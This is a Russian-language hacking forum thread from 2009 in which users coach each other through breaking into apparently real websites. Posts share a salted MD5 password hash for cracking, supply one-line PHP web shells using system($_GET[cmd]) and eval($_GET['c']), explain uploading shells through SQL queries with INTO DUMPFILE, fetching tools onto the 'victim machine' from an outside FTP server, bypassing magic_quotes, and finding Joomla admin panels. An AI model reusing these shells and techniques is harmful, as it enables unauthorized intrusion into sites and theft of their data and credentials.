Ваши вопросы по уязвимостям.

Обсуждение в разделе «Уязвимости», начал(-а) darky, 4.08.2007.

Статус темы:
Тема закрыта для ответов.
  1. Aртем

    Aртем Member

    Регистрация:
    18.10.2009
    Сообщения:
    53
    Одобрения:
    31
    Репутация:
    5
    Вот здесь можно найти пути к log и config файлам:
    http://forum.antichat.ru/thread49775.html

    А хеш:
    Code:
    fec1d6a80adcaefd7e3823362dd89a00:wJpMRIYmjv7FBWdXnzVnvH0gMziLnCCx
    Зашифрован алгоритмом md5($pass.$salt) который есть в программе PasswordsPro.
    Администраторская панель находится чаще по адресу site/joompatch/administrator/ т.к. в Joomla сложно переименовать эту директорию.
     
  2. Train

    Train Member

    Регистрация:
    9.01.2009
    Сообщения:
    21
    Одобрения:
    10
    Репутация:
    4
    Большое спасибо. Попробую пока конфиги почитать, мож найду абсолютный путь... а то не охота брутить его, хотя видюха с CUDA реально великая вещь в этом деле.
     
  3. M1ks

    M1ks Elder - Старейшина

    Регистрация:
    23.08.2007
    Сообщения:
    140
    Одобрения:
    9
    Репутация:
    0
    Что может быть, заливаю шелл через sql запрос, файл создается, вроде заливается, но при заходе на него вылазиет ошибка:
    шелл WSO, там экранирование походу, как можно обойти? или другой шелл посоветуйте... или может из за того что там винда стоит..
     
  4. warlok

    warlok Elder - Старейшина

    Регистрация:
    17.02.2008
    Сообщения:
    328
    Одобрения:
    142
    Репутация:
    81
    лей <?php system($_GET[cmd]) ?> а через него зальеш уже все полноценный если надо будет
     
  5. Ctacok

    Ctacok Banned

    Регистрация:
    19.12.2008
    Сообщения:
    732
    Одобрения:
    646
    Репутация:
    251
    Зачем сразу весь шелл? Для начала eval($_GET['c']);
     
    Это одобряет 1 пользователь.
  6. M1ks

    M1ks Elder - Старейшина

    Регистрация:
    23.08.2007
    Сообщения:
    140
    Одобрения:
    9
    Репутация:
    0
    а в вин как лить через кмд?
     
  7. warlok

    warlok Elder - Старейшина

    Регистрация:
    17.02.2008
    Сообщения:
    328
    Одобрения:
    142
    Репутация:
    81
    через команду ftp подконекться к своему фтпешнику и слей что нужно, или можеш попробывать создать нужный тебе файл примерно так
    Code:
    echo "<?php phpinfo(); ?>" > test.php
    
     
    #9447 warlok, 24.10.2009
    В последний раз редактировалось: 24.10.2009
  8. M1ks

    M1ks Elder - Старейшина

    Регистрация:
    23.08.2007
    Сообщения:
    140
    Одобрения:
    9
    Репутация:
    0
    на том серве нет фтп, там ток ввв порт опен
     
  9. warlok

    warlok Elder - Старейшина

    Регистрация:
    17.02.2008
    Сообщения:
    328
    Одобрения:
    142
    Репутация:
    81
    ты непонял, на том сервере фтп и ненадо ты с него подключаеш к левому и скачиваеш на тачку жетву.
     
    Это одобряет 1 пользователь.
  10. M1ks

    M1ks Elder - Старейшина

    Регистрация:
    23.08.2007
    Сообщения:
    140
    Одобрения:
    9
    Репутация:
    0
    всё спс, понял
     
  11. M1ks

    M1ks Elder - Старейшина

    Регистрация:
    23.08.2007
    Сообщения:
    140
    Одобрения:
    9
    Репутация:
    0
    чето не получается, я ввожу ftp и адрес, он просит логин.. но ввести я не могу, как быть?

    пытался отключить экранирование, в хтаккес прописывал php_value magic_quotes_sybase 0
    но сервер не реагирует на него почемуто..

    если кто желает помочь) пишите в аську)
     
    #9451 M1ks, 24.10.2009
    В последний раз редактировалось: 24.10.2009
  12. Krist_ALL

    Krist_ALL Banned

    Регистрация:
    14.01.2009
    Сообщения:
    436
    Одобрения:
    193
    Репутация:
    24
    какая кмска? мамботс..чет знакомое.все диры 404
     
  13. Pashkela

    Pashkela Динозавр

    Регистрация:
    10.01.2008
    Сообщения:
    2 750
    Одобрения:
    1 044
    Репутация:
    339
    joomla очень похоже
     
  14. Ctacok

    Ctacok Banned

    Регистрация:
    19.12.2008
    Сообщения:
    732
    Одобрения:
    646
    Репутация:
    251
    Дай пару примеров ссылок.
     
  15. Krist_ALL

    Krist_ALL Banned

    Регистрация:
    14.01.2009
    Сообщения:
    436
    Одобрения:
    193
    Репутация:
    24
    ..................../prog_no.shtml
    картинки в img
    все...
    а если папка админ 404 то гдеж админка?
     
  16. Ctacok

    Ctacok Banned

    Регистрация:
    19.12.2008
    Сообщения:
    732
    Одобрения:
    646
    Репутация:
    251
    Joomla.
     
  17. Pashkela

    Pashkela Динозавр

    Регистрация:
    10.01.2008
    Сообщения:
    2 750
    Одобрения:
    1 044
    Репутация:
    339
    у joomla обычно админка в administrator
     
  18. Ctacok

    Ctacok Banned

    Регистрация:
    19.12.2008
    Сообщения:
    732
    Одобрения:
    646
    Репутация:
    251
    Вывод сделал опираясь на это :)
     
    Это одобряет 1 пользователь.
  19. Krist_ALL

    Krist_ALL Banned

    Регистрация:
    14.01.2009
    Сообщения:
    436
    Одобрения:
    193
    Репутация:
    24
    Да эт джумла.



    и такая фигня иногда выскакивает



     
    #9459 Krist_ALL, 24.10.2009
    В последний раз редактировалось: 24.10.2009
  20. Scipio

    Scipio Well-Known Member

    Регистрация:
    2.11.2006
    Сообщения:
    733
    Одобрения:
    544
    Репутация:
    190
    пользуй into dumpfile а не into outfile
     
    Это одобряет 1 пользователь.
Статус темы:
Тема закрыта для ответов.